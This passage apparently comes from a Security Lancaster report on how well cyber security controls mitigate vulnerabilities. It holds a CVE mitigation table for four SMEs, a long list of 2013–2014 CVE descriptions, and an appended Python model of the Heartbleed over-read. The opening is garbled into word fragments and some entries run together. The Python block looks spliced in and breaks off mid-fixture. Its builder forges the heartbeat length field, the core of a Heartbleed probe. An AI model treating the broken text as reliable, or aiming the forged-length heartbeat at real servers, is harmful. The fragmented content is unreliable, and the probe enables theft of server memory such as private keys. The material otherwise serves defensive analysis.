anag
emen
tC
VE
-20
14
-41
32
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 17 of 28
CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE
CVE-2014-4141 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4481 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware
CVE-2014-4617 | y | y | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-4631 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2014-6040 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-6105 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-6136 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-6363 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6369 | y | n | y | y | | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6378 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-6487 | n | n | y | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-7250 | n | y | y | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-7927 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration (Access Control), Patch Management
CVE-2014-7945 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-8447 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management
CVE-2014-8638 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-8835 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-9159 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay]
CVE-2014-9163 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay]
CVE-2014-9350 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Anti-DoS, Firmware Updates
CVE-2014-9357 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware, Secure Configuration
CVE Details

CVE-2013-0008: win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability."

CVE-2013-0022: Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer LsGetTrailInfo Use After Free Vulnerability."

CVE-2013-0084: Directory traversal vulnerability in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "SharePoint Directory Traversal Vulnerability."

CVE-2013-0140: SQL injection vulnerability in the Agent-Handler component in McAfee ePolicy Orchestrator (ePO) before 4.5.7 and 4.6.x before 4.6.6 allows remote attackers to execute arbitrary SQL commands via a crafted request over the Agent-Server communication channel.

CVE-2013-0149: The OSPF implementation in Cisco IOS 12.0 through 12.4 and 15.0 through 15.3, IOS-XE 2.x through 3.9.xS, ASA and PIX 7.x through 9.1, FWSM, NX-OS, and StarOS before 14.0.50488 does not properly validate Link State Advertisement (LSA) type 1 packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a (1) unicast or (2) multicast packet, aka Bug IDs CSCug34485, CSCug34469, CSCug39762, CSCug63304, and CSCug39795.

CVE-2013-0172: Samba 4.0.x before 4.0.1, in certain Active Directory domain-controller configurations, does not properly interpret Access Control Entries that are based on an objectClass, which allows remote authenticated users to bypass intended restrictions on modifying LDAP directory objects by leveraging (1) objectClass access by a user, (2) objectClass access by a group, or (3) write access to an attribute.

CVE-2013-0174: The external node classifier (ENC) API in Foreman before 1.1 allows remote attackers to obtain the hashed root password via an API request.

CVE-2013-0199: The default LDAP ACIs in FreeIPA 3.0 before 3.1.2 do not restrict access to the (1) ipaNTTrustAuthIncoming and (2) ipaNTTrustAuthOutgoing attributes, which allow remote attackers to obtain the Cross-Realm Kerberos Trust key via unspecified vectors.

CVE-2013-0253: The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.

CVE-2013-0270: OpenStack Keystone Grizzly before 2013.1, Folsom, and possibly earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via a large HTTP request, as demonstrated by a long tenant name when requesting a token.

CVE-2013-0481: The console in IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 and 2.2 allows remote attackers to read stack traces by triggering (1) an error or (2) an exception.

CVE-2013-0598: Cross-site request forgery (CSRF) vulnerability in the Web Client in IBM Rational ClearQuest 7.1 before 7.1.2.12, 8.0 before 8.0.0.8, and 8.0.1 before 8.0.1.1 allows remote attackers to hijack the authentication of arbitrary users.

CVE-2013-0619: Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11.x before 11.0.1 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-1530, CVE-2013-0601, CVE-2013-0605, CVE-2013-0616, CVE-2013-0620, and CVE-2013-0623.

CVE-2013-0633: Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013.

CVE-2013-0649: Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0644 and CVE-2013-1374.

CVE-2013-0746: Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 do not properly implement quickstubs that use the jsval data type for their return values, which allows remote attackers to execute arbitrary code or cause a denial of service (compartment mismatch and application crash) via crafted JavaScript code that is not properly handled during garbage collection.

CVE-2013-0753: Use-after-free vulnerability in the serializeToStream implementation in the XMLSerializer component in Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 allows remote attackers to execute arbitrary code via crafted web content.

CVE-2013-0787: Use-after-free vulnerability in the nsEditor::IsPreformatted function in editor/libeditor/base/nsEditor.cpp in Mozilla Firefox before 19.0.2, Firefox ESR 17.x before 17.0.4, Thunderbird before 17.0.4, Thunderbird ESR 17.x before 17.0.4, and SeaMonkey before 2.16.1 allows remote attackers to execute arbitrary code via vectors involving an execCommand call.

CVE-2013-0909: The XSS Auditor in Google Chrome before 25.0.1364.152 allows remote attackers to obtain sensitive HTTP Referer information via unspecified vectors.

CVE-2013-1035: The iTunes ActiveX control in Apple iTunes before 11.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.

CVE-2013-1102: The Wireless Intrusion Prevention System (wIPS) component on Cisco Wireless LAN Controller (WLC) devices with software 7.0 before 7.0.235.0, 7.1, 7.2 before 7.2.110.0, and 7.3 before 7.3.101.0 allows remote attackers to cause a denial of service (device reload) via crafted IP packets, aka Bug ID CSCtx80743.

CVE-2013-1140: The XML parser in Cisco Security Monitoring, Analysis, and Response System (MARS) allows remote attackers to read arbitrary files via an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, aka Bug ID CSCue55093.
CVE-2013-1144: Memory leak in the IKEv1 implementation in Cisco IOS 15.1 allows remote attackers to cause a denial of service (memory consumption) via unspecified (1) IPv4 or (2) IPv6 IKE packets, aka Bug ID CSCth81055.

CVE-2013-1153: Cross-site request forgery (CSRF) vulnerability in the web interface in Cisco Prime Infrastructure allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCue84676.

CVE-2013-1181: Cisco NX-OS on Nexus 5500 devices 4.x and 5.x before 5.0(3)N2(2), Nexus 3000 devices 5.x before 5.0(3)U3(2), and Unified Computing System (UCS) 6200 devices before 2.0(1w) allows remote attackers to cause a denial of service (device reload) by sending a jumbo packet to the management interface, aka Bug IDs CSCtx17544, CSCts10593, and CSCtx95389.

CVE-2013-1303: Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1304 and CVE-2013-1338.

CVE-2013-1384: Adobe Shockwave Player before 12.0.2.122 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-1386.

CVE-2013-1388: Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, 9.0.1 before Update 9, 9.0.2 before Update 4, and 10 before Update 9 allows attackers to obtain administrator-console access via unknown vectors.

CVE-2013-1450: Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not properly reuse TCP sessions to the proxy server, which allows remote attackers to obtain sensitive information intended for a specific host via a crafted HTML document that triggers many HTTPS requests and then triggers an HTTP request to that host, as demonstrated by reading a Cookie header, aka MSRC 12096gd.

CVE-2013-1472: Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.

CVE-2013-1553: Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.6.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Services Security.

CVE-2013-1620: The TLS implementation in Mozilla Network Security Services (NSS) does not properly consider timing side-channel attacks on a noncompliant MAC check operation during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, a related issue to CVE-2013-0169.

CVE-2013-1627: Absolute path traversal vulnerability in NTWebServer.exe in Indusoft Studio 7.0 and earlier and Advantech Studio 7.0 and earlier allows remote attackers to read arbitrary files via a full pathname in an argument to the sub_401A90 CreateFileW function.

CVE-2013-1638: Opera before 12.13 allows remote attackers to execute arbitrary code via crafted clipPaths in an SVG document.

CVE-2013-1669: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 21.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2013-1676: The SelectionIterator::GetNextSegment function in Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds read) via unspecified vectors.

CVE-2013-1700: The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location.

CVE-2013-1734: Cross-site request forgery (CSRF) vulnerability in attachment.cgi in Bugzilla 2.x, 3.x, and 4.0.x before 4.0.11; 4.1.x and 4.2.x before 4.2.7; and 4.3.x and 4.4.x before 4.4.1 allows remote attackers to hijack the authentication of arbitrary users for requests that commit an attachment change via an update action.

CVE-2013-1777: The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not properly implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.

CVE-2013-2319: FileMaker Pro before 12 and Pro Advanced before 12 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-2340: Unspecified vulnerability on the HP ProCurve JCA, JCB, JDA, JDB, JEA, JFA, JFB, JFC, JGA, 658250-B21, and 658247-B21; HP 3COM routers and switches; and HP H3C routers and switches allows remote attackers to execute arbitrary code or obtain sensitive information via unknown vectors.

CVE-2013-2350: Unspecified vulnerability in HP Storage Data Protector 6.2X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1897.

CVE-2013-2492: Stack-based buffer overflow in Firebird 2.1.3 through 2.1.5 before 18514, and 2.5.1 through 2.5.3 before 26623, on Windows allows remote attackers to execute arbitrary code via a crafted packet to TCP port 3050, related to a missing size check during extraction of a group number from CNCT information.

CVE-2013-2507: Multiple cross-site scripting (XSS) vulnerabilities in the Brother MFC-9970CDW printer with firmware G (1.03) allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to admin/log_to_net.html or (2) kind parameter to fax/copy_settings.html, a different vulnerability than CVE-2013-2670 and CVE-2013-2671.

CVE-2013-2736: Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.

CVE-2013-2780: Siemens SIMATIC S7-1200 PLCs 2.x and 3.x allow remote attackers to cause a denial of service (defect-mode transition and control outage) via crafted packets to UDP port 161 (aka the SNMP port).

CVE-2013-2803: ProSoft RadioLinx ControlScape before 6.00.040 uses a deficient PRNG algorithm and seeding strategy for passphrases, which makes it easier for remote attackers to obtain access via a brute-force attack.

CVE-2013-2824: Schneider Electric StruxureWare SCADA Expert Vijeo Citect 7.40, Vijeo Citect 7.20 through 7.30SP1, CitectSCADA 7.20 through 7.30SP1, StruxureWare PowerSCADA Expert 7.30 through 7.30SR1, and PowerLogic SCADA 7.20 through 7.20SR1 do not properly handle exceptions, which allows remote attackers to cause a denial of service via a crafted packet.
CVE-2013-2826: WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and KingGraphic before 3.1.2 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.

CVE-2013-2920: The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 30.0.1599.66 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a www.google.com substring.

CVE-2013-3064: Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1.1.28.147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.

CVE-2013-3116: Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3137: Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability."

CVE-2013-3194: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3199: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3201: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3203, CVE-2013-3206, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3206: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3201, CVE-2013-3203, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3280: EMC RSA Authentication Agent 7.1.x before 7.1.2 for Web for Internet Information Services has a fail-open design, which allows remote attackers to bypass intended access restrictions via vectors that trigger an agent crash.

CVE-2013-3387: Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance 8.6 and 9.x before 9.2(1) allows remote attackers to cause a denial of service (disk consumption) via a flood of TCP packets to port 5400, leading to large error-log files, aka Bug ID CSCua42724.

CVE-2013-3417: The administrative web interface in Cisco Video Surveillance Operations Manager does not properly perform authentication, which allows remote attackers to watch video feeds via a crafted URL, aka Bug ID CSCtg72262.

CVE-2013-3632: The Cron service in rpc.php in OpenMediaVault allows remote authenticated users to execute cron jobs as arbitrary users and execute arbitrary commands via the username parameter.

CVE-2013-3656: Cybozu Office 9.1.0 and earlier does not properly manage sessions, which allows remote attackers to bypass authentication by leveraging knowledge of a login URL.

CVE-2013-3856: Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."

CVE-2013-3860: Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly parse a DTD during XML digital-signature validation, which allows remote attackers to cause a denial of service (application crash or hang) via a crafted signed XML document, aka "Entity Expansion Vulnerability."

CVE-2013-3893: Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help: URL that triggers loading of hxds.dll.

CVE-2013-3897: Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3900: The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability."

CVE-2013-3905: Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability."

CVE-2013-4223: The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.

CVE-2013-4436: The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.

CVE-2013-4478: Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.

CVE-2013-4529: Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.

CVE-2013-4555: Cross-site request forgery (CSRF) vulnerability in ecrire/action/logout.php in SPIP before 2.1.24 allows remote attackers to hijack the authentication of arbitrary users for requests that logout the user via unspecified vectors.

CVE-2013-4776: NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earlier, GS748Tv4 5.4.1.14, and GS510TP 5.0.4.4 allows remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to filesystem/.

CVE-2013-4782: The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.
CVE-2013-5057: hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability."

CVE-2013-5369: IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.

CVE-2013-5428: IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.

CVE-2013-5431: Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.

CVE-2013-5494: Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.

CVE-2013-5507: The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.

CVE-2013-5536: Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.

CVE-2013-5559: Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.

CVE-2013-5561: The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.

CVE-2013-5751: Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.

CVE-2013-5757: Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.

CVE-2013-5828: Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.

CVE-2013-6167: Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.

CVE-2013-6188: Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.

CVE-2013-6284: Unspecified vulnerability in the Statutory Reporting for Insurance (FS-SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability."

CVE-2013-6396: The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-6475: Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.

CVE-2013-6660: The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.

CVE-2013-6699: The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.

CVE-2013-6702: The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.

CVE-2013-6979: The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.

CVE-2013-6994: OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.

CVE-2013-7004: D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.
CVE-2013-7043Multiple cross-site request forgery (CSRF)vulnerabilities on Cisco x000D ScientificAtlanta DPR2320R2 routers with software202r1262-090417 x000D allow remoteattackers to hijack the authentication ofadministrators x000D for requests that(1) change a password via the Passwordparameter to x000D goformRgSecurity(2) reboot the device via the Restartparameter to x000D goformrestart (3)modify Wi-Fi settings as demonstratedby the x000D WpaPreSharedKeyparameter to goformwlanSecurity or(4) modify x000D parental controls viathe ParentalPassword parameter to x000DgoformRgParentalBasic
CVE-2013-7389Multiple cross-site scripting (XSS)vulnerabilities in D-Link DIR-645 Router(Rev A1) with firmware before 104B11allow remote attackers to inject arbitraryweb script or HTML via the (1) deviceidparameter to parentalcontrolsbindphp(2) RESULT parameter to infophp or (3)receiver parameter to bsc sms sendphp
CYBER SECURITY CONTROLS EFFECTIVENESS - Security Lancaster, Page 22 of 28

CVE-2014-0001: Buffer overflow in client/mysql.cc in Oracle MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.
CVE-2014-0035: The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-0160: The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.
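The over-read described in the CVE-2014-0160 entry comes from trusting the 16-bit payload_length field inside the heartbeat message instead of the length of the TLS record that carried it. The following Python is an added illustration written for this report, not OpenSSL code: it models the message layout from RFC 6520 (type, length, payload, padding) against a constructed byte buffer standing in for process memory, and shows the pre-1.0.1g echo beside the 1.0.1g bounds check. Names such as `vulnerable_response` and the contents of `SECRET` are this example's own.

```python
import struct
from typing import Optional, Tuple

HB_REQUEST, HB_RESPONSE = 1, 2
PADDING = 16  # RFC 6520: at least 16 bytes of padding after the payload


def build_heartbeat(payload: bytes, claimed_length: Optional[int] = None) -> bytes:
    """Encode a HeartbeatRequest. claimed_length lets a caller lie about the payload size,
    which is exactly what a Heartbleed probe does."""
    length = len(payload) if claimed_length is None else claimed_length
    return bytes([HB_REQUEST]) + struct.pack(">H", length) + payload + b"\x00" * PADDING


def vulnerable_response(memory: bytes, record_length: int) -> bytes:
    """Pre-1.0.1g behaviour: copies payload_length bytes from the record buffer without
    checking them against record_length, so the copy runs into adjacent memory."""
    (payload_len,) = struct.unpack(">H", memory[1:3])
    echoed = memory[3:3 + payload_len]  # record_length is never consulted
    return bytes([HB_RESPONSE]) + struct.pack(">H", payload_len) + echoed + b"\x00" * PADDING


def fixed_response(memory: bytes, record_length: int) -> Optional[bytes]:
    """1.0.1g behaviour: silently discard the message unless
    type (1) + length (2) + payload + padding (16) fits inside the received record."""
    if record_length < 1 + 2 + PADDING:
        return None
    (payload_len,) = struct.unpack(">H", memory[1:3])
    if 1 + 2 + payload_len + PADDING > record_length:
        return None
    echoed = memory[3:3 + payload_len]
    return bytes([HB_RESPONSE]) + struct.pack(">H", payload_len) + echoed + b"\x00" * PADDING


# Constructed fixture (not real key material): a 4-byte "ping" heartbeat whose header
# claims 16384 bytes, followed in the same buffer by data standing in for a private key.
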